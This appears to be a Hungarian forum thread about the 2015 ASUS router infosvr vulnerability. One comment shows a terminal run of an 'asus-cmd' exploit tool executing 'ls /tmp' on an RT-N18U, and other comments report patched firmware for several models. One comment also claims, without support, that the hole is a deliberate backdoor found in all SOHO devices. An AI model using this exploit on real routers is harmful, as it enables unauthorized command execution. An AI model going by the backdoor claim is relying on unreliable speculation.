- A hozzászóláshoz be kell jelentkezni
- 3558 megtekintés
Hozzászólások
Shitpump.
- A hozzászóláshoz be kell jelentkezni
Az exploit szépen működik RT-N18U masinán is:
[2015-01-10 12:00:13] louise@louise-macbook.louise.hu:/Users/louise/Development/security/asus
./asus-cmd "ls /tmp"
[*] sent command: ls /tmp
[!] received 512 bytes from 192.168.253.204:64156
0c 15 0033 54b10640 41:41:41:41:41:41
0007 ls /tmp
[!] received 512 bytes from 192.168.253.254:9999
0c 16 0033 54b10640 ac:22:0b:99:26:e4
01a3 APPS
Beceem_firmware
asus_app
asus_router.conf
asus_router_tag
avahi
dhcp6c
dm2_amule_status
...
LouiSe
http://louise.hu
- A hozzászóláshoz be kell jelentkezni
Közben megérkezett a firmware frissítés is: http://www.asus.com/hu/Networking/RTN18U/HelpDesk_Download/
ASUS RT-N18U Firmware version 3.0.0.4.376.3754
-Fixed infosvr security issue.
-Fixed Cross-site request forgery security issue
LouiSe
http://louise.hu
- A hozzászóláshoz be kell jelentkezni
RT-N12 D1-eshez ugyanez a verzió letölthetö.
--
robyboy
"Gondolkozni nehéz, ezért legtöbben ítélnek." - Márai Sándor
- A hozzászóláshoz be kell jelentkezni
N66U-ra is letoltheto.
- A hozzászóláshoz be kell jelentkezni
Ebben az a jó, hogy a sebezhetőséget kihasználva workaroundolható a sebezhetőség. :)
- A hozzászóláshoz be kell jelentkezni
Érdekes dolog az előre tervezett, ám eddig sikeresen titkolt backdoor-t hibának nevezni ;) Főleg hogy, hogy az összes SOHO eszközben van ilyen (vagy ehhez hasonló) backdoor, ami nem véletlenül került oda.
--
zrubi.hu
- A hozzászóláshoz be kell jelentkezni